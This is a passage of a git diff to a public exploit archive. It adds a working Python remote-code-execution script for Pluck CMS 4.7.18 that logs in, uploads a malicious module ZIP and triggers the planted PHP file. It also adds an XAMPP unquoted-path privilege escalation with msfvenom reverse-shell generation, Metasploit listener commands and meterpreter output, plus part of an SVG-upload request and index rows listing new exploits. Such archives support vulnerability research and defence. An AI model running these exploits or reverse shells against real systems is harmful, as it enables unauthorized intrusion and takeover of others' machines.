boundary=---------------------------186411693022341939203410401206 +Content-Length: 608 +Origin: http://172.17.0.2 +Connection: close +Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D + +-----------------------------186411693022341939203410401206 +Content-Disposition: form-data; name="file_data"; filename="image.svg" +Content-Type: image/svg+xml + + + + + + + + +-----------------------------186411693022341939203410401206-- + + + +|-----------------------------------------EOF----------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/51592.py b/exploits/php/webapps/51592.py new file mode 100755 index 000000000..27f22d9da --- /dev/null +++ b/exploits/php/webapps/51592.py @@ -0,0 +1,57 @@ +#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE) +#Application: pluck +#Version: 4.7.18 +#Bugs: RCE +#Technology: PHP +#Vendor URL: https://github.com/pluck-cms/pluck +#Software Link: https://github.com/pluck-cms/pluck +#Date of found: 10-07-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + + +import requests +from requests_toolbelt.multipart.encoder import MultipartEncoder + +login_url = "http://localhost/pluck/login.php" +upload_url = "http://localhost/pluck/admin.php?action=installmodule" +headers = {"Referer": login_url,} +login_payload = {"cont1": "admin","bogus": "","submit": "Log in"} + +file_path = input("ZIP file path: ") + +multipart_data = MultipartEncoder( + fields={ + "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"), + "submit": "Upload" + } +) + +session = requests.Session() +login_response = session.post(login_url, headers=headers, data=login_payload) + + +if login_response.status_code == 200: + print("Login account") + + + upload_headers = { + "Referer": upload_url, + "Content-Type": multipart_data.content_type + } + upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data) + + + if upload_response.status_code == 200: + print("ZIP file download.") + else: + print("ZIP file download error. Response code:", upload_response.status_code) +else: + print("Login problem. response code:", login_response.status_code) + + +rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php" + +rce=requests.get(rce_url) + +print(rce.text) \ No newline at end of file diff --git a/exploits/windows/local/51585.txt b/exploits/windows/local/51585.txt new file mode 100644 index 000000000..2c0417a4f --- /dev/null +++ b/exploits/windows/local/51585.txt @@ -0,0 +1,59 @@ +# Exploit Title: XAMPP 8.2.4 - Unquoted Path +# Date: 07/2023 +# Exploit Author: Andrey Stoykov +# Version: 8.2.4 +# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe +# Tested on: Windows Server 2022 +# Blog: http://msecureltd.blogspot.com/ + + +Steps to Exploit: + +1. Search for unquoted paths +2. Generate meterpreter shell +3. Copy shell to XAMPP directory replacing "mysql.exe" +4. Exploit by double clicking on shell + + +C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ + +mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto + + + +// Generate shell +msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe + + +// Setup listener +msf6 > use exploit/multi/handler +msf6 exploit(multi/handler) > set lhost 192.168.1.13 +msf6 exploit(multi/handler) > set lport 4443 +msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp +msf6 exploit(multi/handler) > run + + +msf6 exploit(multi/handler) > run + +[*] Started reverse TCP handler on 192.168.1.13:4443 +[*] Sending stage (175686 bytes) to 192.168.1.11 +[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700 + + +meterpreter > getuid +Server username: WIN-5PT4K404NLO\astoykov +meterpreter > getpid +Current pid: 4724 +meterpreter > shell +Process 5884 created. +Channel 1 created. +Microsoft Windows [Version 10.0.20348.1] +(c) Microsoft Corporation. All rights reserved. +[...] +C:\xampp\mysql\bin>dir +dir + Volume in drive C has no label. + Volume Serial Number is 80B5-B405 + + Directory of C:\xampp\mysql\bin +[...] \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dbeb5d010..23a589119 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -4141,6 +4141,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,,2019-07-15,2019-07-15,0,CVE-2019-1943,,,,, 17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",webapps,hardware,,2011-09-19,2011-09-19,0,CVE-2011-2577;OSVDB-75663;CVE-2011-2544;CVE-2011-2543;OSVDB-75662;OSVDB-74901,,,,,http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf 49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,,2021-01-18,2021-01-18,0,,,,,, +51589,exploits/hardware/webapps/51589.txt,"Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass",2023-07-15,"Fatih Sencer",webapps,hardware,,2023-07-15,2023-07-15,0,CVE-2019-1937,,,,, 40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware,,2016-12-07,2016-12-07,0,CVE-2013-5528,,,,, 47153,exploits/hardware/webapps/47153.txt,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,,2019-07-24,2020-01-09,0,CVE-2019-12624,"Cross-Site Request Forgery (CSRF)",,,, 49038,exploits/hardware/webapps/49038.rb,"Citrix ADC NetScaler - Local File Inclusion (Metasploit)",2020-11-13,"RAMELLA Sebastien",webapps,hardware,,2020-11-13,2020-11-13,0,,,,,, @@ -5527,7 +5528,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java,,2008-11-09,2014-03-29,1,OSVDB-49752;OSVDB-105626,,,,,https://www.securityfocus.com/bid/32208/info 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,,2012-12-13,2017-05-12,1,,,,,,https://www.securityfocus.com/bid/56933/info 51205,exploits/java/webapps/51205.py,"Nacos 2.0.3 - Access Control vulnerability",2023-04-03,"Jenson Zhao",webapps,java,,2023-04-03,2023-04-03,0,CVE-2021-43116,,,,, -51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-11,0,,,,,, +51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-15,1,,,,,, 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,,2021-03-29,2021-03-29,0,,,,,, 26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java,,2005-07-15,2013-06-07,1,CVE-2005-2276;OSVDB-18064,,,,,https://www.securityfocus.com/bid/14310/info 32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,,2009-04-15,2019-03-28,1,CVE-2009-1294;OSVDB-53937,,,,,https://www.securityfocus.com/bid/34531/info @@ -13460,6 +13461,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21005,exploits/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",webapps,php,,2012-09-02,2016-11-28,1,CVE-2012-4749;CVE-2012-4748;OSVDB-85146;OSVDB-85145,,,,http://www.exploit-db.comadmidio-2.3.5.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt 42005,exploits/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",webapps,php,,2017-05-15,2017-05-15,1,CVE-2017-8382,,,,http://www.exploit-db.comadmidio-3.2.8.zip, 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80,2018-09-03,2018-09-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadmidio-3.3.5.zip, +51590,exploits/php/webapps/51590.txt,"Admidio v4.2.10 - Remote Code Execution (RCE)",2023-07-15,"Mirabbas Ağalarov",webapps,php,,2023-07-15,2023-07-15,0,,,,,, 51402,exploits/php/webapps/51402.txt,"admidio v4.2.5 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 36290,exploits/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,webapps,php,,2011-11-07,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50562/info 9161,exploits/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-56235;CVE-2009-2558,,,,, @@ -15128,8 +15130,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-07-04,1,,,,,, 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2023-07-07,1,,,,,, 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2023-07-07,1,,,,,, -50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,, -50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,, +50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2023-07-15,1,,,,,, +50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2023-07-15,1,,,,,, 51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,, 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,, 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,, @@ -19692,6 +19694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 51329,exploits/php/webapps/51329.py,"Icinga Web 2.10 - Arbitrary File Disclosure",2023-04-08,"Jacob Ebben",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-24716,,,,, +51586,exploits/php/webapps/51586.py,"Icinga Web 2.10 - Authenticated Remote Code Execution",2023-07-15,"Dante Corona",webapps,php,,2023-07-15,2023-07-15,0,CVE-2022-24715,,,,, 42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php,,2011-03-30,2014-12-16,1,CVE-2011-1557;OSVDB-73408,,,,,https://www.securityfocus.com/bid/47100/info 42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, @@ -24276,6 +24279,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2325,exploits/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,webapps,php,,2006-09-06,,1,OSVDB-30790;CVE-2006-4678;OSVDB-30789,,,,, 26818,exploits/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4262;OSVDB-21751,,,,,https://www.securityfocus.com/bid/15857/info 26819,exploits/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4263;OSVDB-21752,,,,,https://www.securityfocus.com/bid/15857/info +51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-07-15,0,,,,,, 19180,exploits/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,,2012-06-16,2012-06-17,1,OSVDB-82995;OSVDB-82994;OSVDB-82993;OSVDB-82992,,,,,https://www.vulnerability-lab.com/get_content.php?id=600 15843,exploits/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,webapps,php,,2010-12-29,2010-12-29,0,,,,,, 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,, @@ -27735,6 +27739,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",2022-03-16,"Ashish Koli",webapps,php,,2022-03-16,2022-03-16,0,CVE-2022-26965,,,,, 40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",webapps,php,,2016-10-18,2016-10-18,0,,,,,http://www.exploit-db.compluck-4.7.3.zip, 38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,webapps,php,80,2015-08-28,2015-08-28,0,OSVDB-126897;OSVDB-126896;OSVDB-126895;OSVDB-126894;OSVDB-126893,,,,http://www.exploit-db.compluck-4.7.3.tar.gz, +51592,exploits/php/webapps/51592.py,"Pluck v4.7.18 - Remote Code Execution (RCE)",2023-07-15,"Mirabbas Ağalarov",webapps,php,,2023-07-15,2023-07-15,0,,,,,, 51420,exploits/php/webapps/51420.txt,"pluck v4.7.18 - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,, 24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",webapps,php,,2004-08-07,2013-01-24,1,OSVDB-8349,,,,,https://www.securityfocus.com/bid/10885/info 35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46962/info @@ -28154,6 +28159,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,, 49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,, 51387,exploits/php/webapps/51387.txt,"ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, +51588,exploits/php/webapps/51588.txt,"ProjeQtOr Project Management System v10.4.1 - Multiple XSS",2023-07-15,"Mirabbas Ağalarov",webapps,php,,2023-07-15,2023-07-15,0,,,,,, 45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip, 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,, 11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip, @@ -32352,6 +32358,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3622,exploits/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User",2007-04-01,rgod,webapps,php,,2007-03-31,2016-09-29,1,OSVDB-34677;CVE-2005-3811,,,,, 10653,exploits/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61350;CVE-2009-4678,,,,, 18290,exploits/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,webapps,php,,2011-12-29,2011-12-29,1,CVE-2011-5026;OSVDB-78070,,,,http://www.exploit-db.comwinn_guestbook_v2.4.8c.zip, +51591,exploits/php/webapps/51591.txt,"WinterCMS < 1.2.3 - Persistent Cross-Site Scripting",2023-07-15,"abhishek morla",webapps,php,,2023-07-15,2023-07-15,0,CVE-2023-37269,,,,, 39332,exploits/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-27,1,OSVDB-107116,,,,,https://www.securityfocus.com/bid/67481/info 3686,exploits/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,webapps,php,,2007-04-07,2016-09-30,1,OSVDB-34735;CVE-2007-1928,,,,http://www.exploit-db.comwitshare-0.9.zip, 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,80,2018-05-28,2018-08-02,0,CVE-2018-11512,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comwityCMS-0.6.1.tar.gz, @@ -41696,6 +41703,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows,,2019-03-25,2019-03-25,0,,Local,,,http://www.exploit-db.comxns56p_setup.exe, 46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows,,2019-03-25,2019-03-25,0,,"Buffer Overflow",,,http://www.exploit-db.comxns56p_setup.exe, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",2021-09-27,"Salman Asad",local,windows,,2021-09-27,2022-08-01,0,CVE-2020-11107,,,,, +51585,exploits/windows/local/51585.txt,"XAMPP 8.2.4 - Unquoted Path",2023-07-15,"Andrey Stoykov",local,windows,,2023-07-15,2023-07-15,0,,,,,, 45828,exploits/windows/local/45828.py,"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)",2018-11-13,"Semen Alexandrovich Lyhin",local,windows,,2018-11-13,2018-11-13,0,,Local,,,http://www.exploit-db.comxampp-win32-5.6.38-0-VC11-installer.exe, 4325,exploits/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Local Privilege Escalation",2007-08-27,Inphex,local,windows,,2007-08-26,2010-09-24,1,,,,,http://www.exploit-db.comxampp-win32-1.6.3a-installer.exe, 10371,exploits/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,local,windows,,2009-12-09,,1,OSVDB-57162,,,,http://www.exploit-db.comXenorate_62542.exe,